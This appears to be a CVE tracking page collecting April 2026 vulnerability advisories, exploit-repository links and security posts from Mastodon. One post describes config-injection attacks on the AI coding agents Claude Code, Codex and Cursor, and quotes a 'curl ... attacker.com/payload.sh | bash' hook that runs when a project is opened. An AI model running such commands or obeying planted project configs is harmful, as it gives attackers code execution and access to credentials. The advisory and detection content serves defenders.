In the Linux kernel, the following vulnerability has been resolved: seg6: separate dst_cache for input and output paths in seg6 lwtunnel The seg6 lwtunnel uses a single dst_cache per encap route, shared between seg6_input_core() and seg6_output_core(). These two paths can perform the post-encap SID lookup in different routing contexts (e.g., ip rules matching on the ingress interface, or VRF tab

thehackerwire@mastodon.social at 2026-04-28T01:01:12.000Z ##

🔴 CVE-2026-31668 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

seg6: separate dst_cache for input and output paths in seg6 lwtunnel

The seg6 lwtunnel uses a single dst_cache per encap route, shared
between seg6_input_core() and seg6_output_...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31637
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T15:30:46

1 posts

In the Linux kernel, the following vulnerability has been resolved: rxrpc: reject undecryptable rxkad response tickets rxkad_decrypt_ticket() decrypts the RXKAD response ticket and then parses the buffer as plaintext without checking whether crypto_skcipher_decrypt() succeeded. A malformed RESPONSE can therefore use a non-block-aligned ticket length, make the decrypt operation fail, and still d

thehackerwire@mastodon.social at 2026-04-28T03:08:05.000Z ##

🔴 CVE-2026-31637 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

rxrpc: reject undecryptable rxkad response tickets

rxkad_decrypt_ticket() decrypts the RXKAD response ticket and then
parses the buffer as plaintext without checking whether
cry...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40372
(9.1 CRITICAL)

EPSS: 0.02%

updated 2026-04-24T19:59:44

2 posts

## Executive Summary: A bug in `Microsoft.AspNetCore.DataProtection` 10.0.0-10.0.6 NuGet packages can give an attacker the opportunity to execute an Elevation of Privilege attack by forging authentication cookies, and also allows some protected payloads to be decrypted. If an attacker used forged payloads to authenticate as a privileged user during the vulnerable window, they may have induced t

adulau@infosec.exchange at 2026-04-28T05:41:08.000Z ##

The diversity of advisory is key. Look at how good the advisory of GitHub is compared to the others.

db.gcve.eu/vuln/cve-2026-40372

#cve #vulnerability #vulnerabilitymanagement

##

hackmag@infosec.exchange at 2026-04-28T04:30:02.000Z ##

⚪️ Microsoft Issues Emergency Patch for Critical ASP.NET Vulnerability

🗨️ Microsoft has released an out-of-band update for ASP.NET Core. The patch fixes a critical vulnerability in the Data Protection cryptographic APIs that allowed unauthenticated attackers to obtain SYSTEM privileges by forging authentication cookies. The vulnerability is tracked as CVE-2026-40372 and…

🔗 hackmag.com/news/asp-net-patch

#news

##

CVE-2026-41651
(8.8 HIGH)

EPSS: 0.20%

updated 2026-04-24T13:43:37.347000

1 posts

PackageKit is a a D-Bus abstraction layer that allows the user to manage packages in a secure way using a cross-distro, cross-architecture API. PackageKit between and including versions 1.0.2 and 1.3.4 is vulnerable to a time-of-check time-of-use (TOCTOU) race condition on transaction flags that allows unprivileged users to install packages as root and thus leads to a local privilege escalation. T

6 repos

https://github.com/dinosn/pack2theroot-lab

https://github.com/baph00met/CVE-2026-41651

https://github.com/0xBlackash/CVE-2026-41651

https://github.com/shibaaa204/Pack2TheRoot

https://github.com/Vozec/CVE-2026-41651

https://github.com/CipherCloak/CVE-2026-41651

linux@activitypub.awakari.com at 2026-04-26T01:29:51.000Z ## A 12-Year-Old Flaw, an AI, and Root Access: What CVE-2026–41651 Says About Linux Security The bug wasn’t new. It was just never found. PackageKit has been shipping with Linux distributions sin...

#devops #programming #vulnerability #linux #cybersecurity

Origin | Interest | Match ##

CVE-2026-35431
(10.0 CRITICAL)

EPSS: 0.09%

updated 2026-04-24T00:31:58

1 posts

Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management allows an unauthorized attacker to perform spoofing over a network.

beyondmachines1@infosec.exchange at 2026-04-28T16:01:29.000Z ##

Microsoft Patches Critical CVSS 10.0 SSRF Vulnerability in Entra ID

Microsoft patched a critical SSRF vulnerability (CVE-2026-35431) in Entra ID Entitlement Management with a CVSS score of 10.0 that allowed unauthenticated spoofing and internal network access. The flaw was fixed server-side, requiring no action from users to secure their environments.

**No action is needed on your part, Microsoft already fixed this vulnerability on their cloud servers on April 23, 2026. As a good practice, review your Entra ID sign-in and audit logs for any unusual activity from before that date, and ensure multi-factor authentication is enforced for all admin accounts.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-5450
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-23T18:32:57

1 posts

Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow.

vitobotta@mastodon.social at 2026-04-28T15:01:12.000Z ##

Three glibc CVEs, including CVSS 9.8 heap overflow in scanf (CVE-2026-5450). Affects glibc 2.7 through 2.43, that's decades of releases. When the C library has bugs, everything on Linux has bugs. Patch.

##

CVE-2026-33626
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-23T13:39:54.420000

1 posts

LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networ

CVE-2026-3844
(9.8 CRITICAL)

EPSS: 0.08%

updated 2026-04-23T04:00:28

1 posts

The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'fetch_gravatar_from_remote' function in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability can only be exploited

4 repos

https://github.com/dinosn/CVE-2026-3844

https://github.com/0xgh057r3c0n/CVE-2026-3844

https://github.com/tausifzaman/CVE-2026-3844

https://github.com/im-hanzou/CVE-2026-3844

CVE-2026-35369
(5.5 MEDIUM)

EPSS: 0.02%

updated 2026-04-22T18:31:57

1 posts

An argument parsing error in the kill utility of uutils coreutils incorrectly interprets kill -1 as a request to send the default signal (SIGTERM) to PID -1. Sending a signal to PID -1 causes the kernel to terminate all processes visible to the caller, potentially leading to a system crash or massive process termination. This differs from GNU coreutils, which correctly recognizes -1 as a signal nu

mxey@hachyderm.io at 2026-04-29T17:11:17.000Z ##

“The clearest example is kill -1 (CVE-2026-35369). GNU reads -1 as “signal 1” and asks for a PID. uutils read it as “send the default signal to PID -1”, which on Linux means every process you can see. Yikes!”

wat

##

CVE-2026-22007
(2.9 LOW)

EPSS: 0.02%

updated 2026-04-22T15:31:39

1 posts

Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u481, 8u481-b50, 8u481-perf, 11.0.30, 17.0.18, 21.0.10, 25.0.2, 26; Oracle GraalVM for JDK: 17.0.18 and 21.0.10; Oracle GraalVM Enterprise Edition: 21.3.17. Difficult to exploit vulnerability allo

linux@activitypub.awakari.com at 2026-04-27T20:20:32.000Z ## Debian OpenJDK DSA-6231-1 Important Crypto Key Issues CVE-2026-22007 Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in incorrect generation of cryptograp...

#Debian #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-5588
(0 None)

EPSS: 0.01%

updated 2026-04-21T16:16:20.540000

1 posts

Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcpkix on all (pkix modules), Legion of the Bouncy Castle Inc. BCPKIX-FIPS bcpkix on All (pkix modules). This vulnerability is associated with program files JcaContentVerifierProviderBuilder.Java. This issue affects BC-JAVA: from 1.67 before 1.84; BCPKIX-FIPS: from 2.0.6 before 2.0.11, from

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-61260
(9.8 CRITICAL)

EPSS: 0.10%

updated 2026-04-17T15:24:57.753000

1 posts

A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enables code execution through malicious MCP (Model Context Protocol) configuration files. The attack is triggered when a user runs the codex command inside a malicious or compromised repository. Codex automatically loads project-local .env and .codex/config.toml files without requiring user confirmation, allowing attackers

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

CVE-2026-20148
(4.9 MEDIUM)

EPSS: 0.06%

updated 2026-04-17T15:09:46.880000

1 posts

A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to perform path traversal attacks on the underlying operating system and read arbitrary files. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2026-40261
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-16T21:55:08

1 posts

### Impact The `Perforce::syncCodeBase()` method appended the `$sourceReference` parameter to a shell command without proper escaping, allowing an attacker to inject arbitrary commands through a crafted source reference containing shell metacharacters. Further as in GHSA-wg36-wvj6-r67p / CVE-2026-40176 the `Perforce::generateP4Command()` method constructed shell commands by interpolating user-supp

2 repos

https://github.com/daptheHuman/cve-2026-40176-cve-2026-40261

https://github.com/terminat0r7031/composer-CVE-2026-40261-CVE-2026-40176-PoC

canartuc@mastodon.social at 2026-04-29T15:57:45.000Z ##

Composer (the dominant PHP package manager) shipped 2.9.6 and 2.2.27 LTS in April. The release fixes two command-injection bugs in the Perforce driver. CVE-2026-40261, severity 8.8. A malicious composer.json declares a Perforce repository and the shell runs whether or not Perforce is installed. Packagist disabled Perforce metadata April 10. Most CI build agents kept no audit trail across the ninety days the bug was live.

#PHP #CyberSecurity #DevOps #InfoSec #SupplyChain

##

CVE-2026-34197
(8.8 HIGH)

EPSS: 65.07%

updated 2026-04-16T21:49:17

2 posts

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) a

Nuclei template

9 repos

https://github.com/Catherines77/ActiveMQ-EXPtools

https://github.com/hg0434hongzh0/CVE-2026-34197

https://github.com/keraattin/CVE-2026-34197

https://github.com/dinosn/CVE-2026-34197

https://github.com/AtoposX-J/CVE-2026-34197-Apache-ActiveMQ-RCE

https://github.com/KONDORDEVSECURITYCORP/CVE-2026-34197

https://github.com/xshysjhq/CVE-2026-34197-payload-Apache-ActiveMQ-

https://github.com/DEVSECURITYSPRO/CVE-2026-34197

https://github.com/0xBlackash/CVE-2026-34197

spinscale@mastodon.social at 2026-04-29T12:56:01.000Z ##

Remote Code Execution in Apache ActiveMQ

"By calling addNetworkConnector through Jolokia with a crafted URI, an attacker can chain these mechanisms together to force the broker to fetch and execute a remote Spring XML configuration file"

horizon3.ai/attack-research/di

##

spinscale@mastodon.social at 2026-04-29T12:56:01.000Z ##

Remote Code Execution in Apache ActiveMQ

"By calling addNetworkConnector through Jolokia with a crafted URI, an attacker can chain these mechanisms together to force the broker to fetch and execute a remote Spring XML configuration file"

horizon3.ai/attack-research/di

##

CVE-2026-20147
(10.0 CRITICAL)

EPSS: 0.28%

updated 2026-04-15T18:32:04

1 posts

A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sendi

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-60751
(7.5 HIGH)

EPSS: 0.02%

updated 2026-04-15T00:35:42.020000

1 posts

GeographicLib 2.5 is vulnerable to Buffer Overflow in GeoConvert DMS::InternalDecode.

1 repos

https://github.com/zer0matt/CVE-2025-60751

exploitdb_bot@mastodon.social at 2026-04-29T10:31:05.000Z ##

🚨 New Exploit: GeographicLib v2.5.1 - stack buffer overflow
📋 CVE: CVE-2025-60751
👤 Author: rosario

🔗 exploit-db.com/exploits/52522

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-60751

##

CVE-2026-40200
(8.2 HIGH)

EPSS: 0.02%

updated 2026-04-10T18:31:28

1 posts

An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i.e., the 32nd Leonardo number on 32-bit platforms (or the 64th Leonardo number on 64-bit platforms, which is not practical).

airtower@woem.men at 2026-04-29T17:44:52.465Z ##

@adulau@infosec.exchange @gcve@social.circl.lu For context: #Buildroot has tools to list known vulnerabilities for packages, currently based on NVD data (via https://github.com/fkie-cad/nvd-json-data-feeds).

I noticed it's missing a bunch of vulnerabilities (e.g. CVE-2026-40200, CVE-2026-6042 in musl libc) because the NVD data is missing CPE match information. At the time the CVEs were listed as "Awaiting Analysis", now "Deferred", so I assume it's not going to be added any time soon, if ever (generally the CPE match is present for vulnerabilities in "Analyzed" status). Looking at the GCVE listings was an attempt to find another, hopefully better, source, because an automated check that misses so many vulnerabilities is not going to be very useful.

Today
@Bubu@chaos.social pointed me at a similar example: CVE-2025-6020 (note the year), a "high" level vulnerability in linux-pam, which is also marked as "Deferred" in NVD. So we really could use a better source.

We'd need one we can download (rather than query individual packages one by one) without excessive load, but solving that is another matter, first we need a suitable source at all.

##

CVE-2026-6042
(3.3 LOW)

EPSS: 0.01%

updated 2026-04-10T12:31:44

1 posts

A security flaw has been discovered in musl libc up to 1.2.6. Affected is the function iconv of the file src/locale/iconv.c of the component GB18030 4-byte Decoder. Performing a manipulation results in inefficient algorithmic complexity. The attack must be initiated from a local position. To fix this issue, it is recommended to deploy a patch.

1 repos

https://github.com/jensnesten/CVE-2026-6042-PoC

airtower@woem.men at 2026-04-29T17:44:52.465Z ##

@adulau@infosec.exchange @gcve@social.circl.lu For context: #Buildroot has tools to list known vulnerabilities for packages, currently based on NVD data (via https://github.com/fkie-cad/nvd-json-data-feeds).

I noticed it's missing a bunch of vulnerabilities (e.g. CVE-2026-40200, CVE-2026-6042 in musl libc) because the NVD data is missing CPE match information. At the time the CVEs were listed as "Awaiting Analysis", now "Deferred", so I assume it's not going to be added any time soon, if ever (generally the CPE match is present for vulnerabilities in "Analyzed" status). Looking at the GCVE listings was an attempt to find another, hopefully better, source, because an automated check that misses so many vulnerabilities is not going to be very useful.

Today
@Bubu@chaos.social pointed me at a similar example: CVE-2025-6020 (note the year), a "high" level vulnerability in linux-pam, which is also marked as "Deferred" in NVD. So we really could use a better source.

We'd need one we can download (rather than query individual packages one by one) without excessive load, but solving that is another matter, first we need a suitable source at all.

##

CVE-2025-8065
(6.5 MEDIUM)

EPSS: 0.08%

updated 2026-04-03T17:16:41.710000

2 posts

A stack-based buffer overflow vulnerability was identified in the ONVIF SOAP XML Parser in Tapo C200 v3 and C520WS v2.6. When processing XML tags with namespace prefixes, the parser fails to validate the prefix length before copying it to a fixed-size stack buffer. It allowed a crafted SOAP request with an oversized namespace prefix to cause memory corruption in stack. An unauthenticated attack

CVE-2026-35414
(4.2 MEDIUM)

EPSS: 0.02%

updated 2026-04-02T18:31:50

1 posts

OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon scenarios involving a principals list in conjunction with a Certificate Authority that makes certain use of comma characters.

2 repos

https://github.com/killercd/CVE-2026-35414

https://github.com/dehobbs/cve_2026_35414

chrispy@chaos.social at 2026-04-28T15:51:14.000Z ##

@kubikpixel Behoben wurde die Schwachstelle bereits Anfang April mit der Veröffentlichung von OpenSSH 10.3

Detail Description :
nvd.nist.gov/vuln/detail/CVE-2
(mW ein weiterhin funktionierender und gemeinnütziger Service der Regierung der United States :awesome: )

##

CapTechGroup@mastodon.social at 2026-04-29T12:54:25.000Z ##

CISA's KEV catalog now includes CVE-2024-1708 and CVE-2024-1709 (ConnectWise ScreenConnect auth bypass + RCE chain) plus CVE-2026-32202 (Windows Shell). APT28 has been weaponizing these since December 2025. The...

captechgroup.com/about-us/thre

##

CVE-2025-32432
(10.0 CRITICAL)

EPSS: 87.87%

updated 2026-03-20T21:28:38

1 posts

### Impact This is an additional fix for https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g This is a high-impact, low-complexity attack vector. To mitigate the issue, users running Craft installations before the fixed versions are encouraged to update to at least that version. ### Details https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432 ### References https

Nuclei template

4 repos

https://github.com/Sachinart/CVE-2025-32432

https://github.com/bambooqj/CVE-2025-32432

https://github.com/Chocapikk/CVE-2025-32432

https://github.com/CTY-Research-1/CVE-2025-32432-PoC

exploitdb_bot@mastodon.social at 2026-04-29T11:11:08.000Z ##

🚨 New Exploit: Craft CMS 5.6.16 - RCE
📋 CVE: CVE-2025-32432
👤 Author: banyamer

🔗 exploit-db.com/exploits/52525

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-32432

##

CVE-2026-21510
(8.8 HIGH)

EPSS: 3.35%

updated 2026-02-10T21:31:29

1 posts

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

1 repos

https://github.com/andreassudo/CVE-2026-21510-CVSS-8.8-Important-Windows-Shell-security-feature-bypass

cyberveille@mastobot.ping.moi at 2026-04-29T12:30:26.000Z ##

📢 Patch incomplet d'APT28 : CVE-2026-21510 laisse place à CVE-2026-32202, coercition d'authentification zero-click
📝 ## 🔍 Contexte

Publié le 23 avril 2026 par Maor Daha...
📖 cyberveille : cyberveille.ch/posts/2026-04-2
🌐 source : akamai.com/blog/security-resea
#APT28 #CVE_2026_21510 #Cyberveille

##

CVE-2026-24061
(9.8 CRITICAL)

EPSS: 87.77%

updated 2026-02-10T18:30:34

1 posts

telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.

Nuclei template

69 repos

https://github.com/leonjza/inetutils-telnetd-auth-bypass

https://github.com/Gabs-hub/CVE-2026-24061_Lab

https://github.com/ms0x08-dev/CVE-2026-24061-POC

https://github.com/Risma2025/CVE-2026-24061-GNU-InetUtils-telnetd-Authentication-Bypass-Vulnerability

https://github.com/0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061

https://github.com/Chocapikk/CVE-2026-24061

https://github.com/athack-ctf/chall2026-telneted

https://github.com/SafeBreach-Labs/CVE-2026-24061

https://github.com/RStephanH/vuln-deb

https://github.com/przemytn/CVE-2026-24061

https://github.com/nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector

https://github.com/xuemian168/CVE-2026-24061

https://github.com/killsystema/scan-cve-2026-24061

https://github.com/midox008/CVE-2026-24061

https://github.com/0x7556/CVE-2026-24061

https://github.com/shivam-bathla/CVE-2026-24061-setup

https://github.com/SystemVll/CVE-2026-24061

https://github.com/TryA9ain/CVE-2026-24061

https://github.com/0xBlackash/CVE-2026-24061

https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd

https://github.com/Alter-N0X/CVE-2026-24061-POC

https://github.com/balgan/CVE-2026-24061

https://github.com/lavabyte/telnet-CVE-2026-24061

https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061

https://github.com/setuju/telnetd

https://github.com/Parad0x7e/CVE-2026-24061

https://github.com/BrainBob/CVE-2026-24061

https://github.com/ridpath/Terrminus-CVE-2026-2406

https://github.com/franckferman/CVE_2026_24061

https://github.com/SeptembersEND/CVE--2026-24061

https://github.com/X-croot/CVE-2026-24061_POC

https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester

https://github.com/Mefhika120/Ashwesker-CVE-2026-24061

https://github.com/ibrahmsql/CVE-2026-24061-PoC

https://github.com/m3ngx1ng/cve_2026_24061_cli

https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-

https://github.com/XsanFlip/CVE-2026-24061-Scanner

https://github.com/ilostmypassword/Melissae-Honeypot-Framework

https://github.com/hackingyseguridad/root

https://github.com/Remnant-DB/CVE-2026-24061

https://github.com/Ali-brarou/telnest

https://github.com/obrunolima1910/CVE-2026-24061

https://github.com/r00tuser111/CVE-2026-24061

https://github.com/typeconfused/CVE-2026-24061

https://github.com/buzz075/CVE-2026-24061

https://github.com/cumakurt/tscan

https://github.com/HD0x01/CVE-2026-24061-NSE

https://github.com/mbanyamer/CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

https://github.com/madfxr/Twenty-Three-Scanner

https://github.com/scumfrog/cve-2026-24061

https://github.com/ekomsSavior/telnet_scan

https://github.com/Lingzesec/CVE-2026-24061-GUI

https://github.com/punitdarji/telnetd-cve-2026-24061

https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root

https://github.com/h3athen/CVE-2026-24061

https://github.com/novitahk/Exploit-CVE-2026-24061

https://github.com/monstertsl/CVE-2026-24061

https://github.com/z3n70/CVE-2026-24061

https://github.com/JayGLXR/CVE-2026-24061-POC

https://github.com/tiborscholtz/CVE-2026-24061

https://github.com/canpilayda/inetutils-telnetd-cve-2026-24061

https://github.com/hyu164/Terrminus-CVE-2026-2406

https://github.com/0p5cur/CVE-2026-24061-POC

https://github.com/infat0x/CVE-2026-24061

https://github.com/Mr-Zapi/CVE-2026-24061

https://github.com/parameciumzhang/Tell-Me-Root

https://github.com/LucasPDiniz/CVE-2026-24061

https://github.com/yanxinwu946/CVE-2026-24061--telnetd

https://github.com/duy-31/CVE-2026-24061---telnetd

exploitdb_bot@mastodon.social at 2026-04-29T11:11:05.000Z ##

🚨 New Exploit: GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation
📋 CVE: CVE-2026-24061
👤 Author: aliguliyev

🔗 exploit-db.com/exploits/52524

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-24061

##

CVE-2026-22704
(8.0 HIGH)

EPSS: 0.02%

updated 2026-02-05T20:59:55.283000

1 posts

HAX CMS helps manage microsite universe with PHP or NodeJs backends. In versions 11.0.6 to before 25.0.0, HAX CMS is vulnerable to stored XSS, which could lead to account takeover. This issue has been patched in version 25.0.0.

exploitdb_bot@mastodon.social at 2026-04-29T11:21:05.000Z ##

🚨 New Exploit: HAX CMS 24.x - Stored Cross-Site Scripting (XSS)
📋 CVE: CVE-2026-22704
👤 Author: banyamer

🔗 exploit-db.com/exploits/52526

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-22704

##

CVE-2025-12383(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-02-05T15:43:37

1 posts

In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignoring of critical SSL configurations - such as mutual authentication, custom key/trust stores, and other security settings. This issue may result in SSLHandshakeException under normal circumstances, but under certain conditions, it could lead to unauthorized trust in insecure servers (see PoC)

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2026-24421
(6.5 MEDIUM)

EPSS: 0.02%

updated 2026-01-28T04:43:47

1 posts

### Summary Authenticated non‑admin users can call /api/setup/backup and trigger a configuration backup. The endpoint only checks authentication, not authorization, and returns a link to the generated ZIP. ### Details SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged‑in user to create a sensitive backu

exploitdb_bot@mastodon.social at 2026-04-29T10:31:08.000Z ##

🚨 New Exploit: phpMyFAQ 4.0.16 - Improper Authorization
📋 CVE: CVE-2026-24421
👤 Author: contact

🔗 exploit-db.com/exploits/52523

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-24421

##

CVE-2025-68705
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-01-16T19:29:47.410000

1 posts

RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.78, RustFS contains a path traversal vulnerability in the /rustfs/rpc/read_file_stream endpoint. This issue has been patched in version 1.0.0-alpha.79.

1 repos

https://github.com/imjdl/CVE-2025-68705

Zardus@defcon.social at 2026-04-28T15:45:11.000Z ##

@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.

First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.

The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.

This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (newsletter.semianalysis.com/p/), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).

The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as dpc.pw/posts/i-dont-want-your-), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 cs.fsu.edu/~whalley/papers/tec). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.

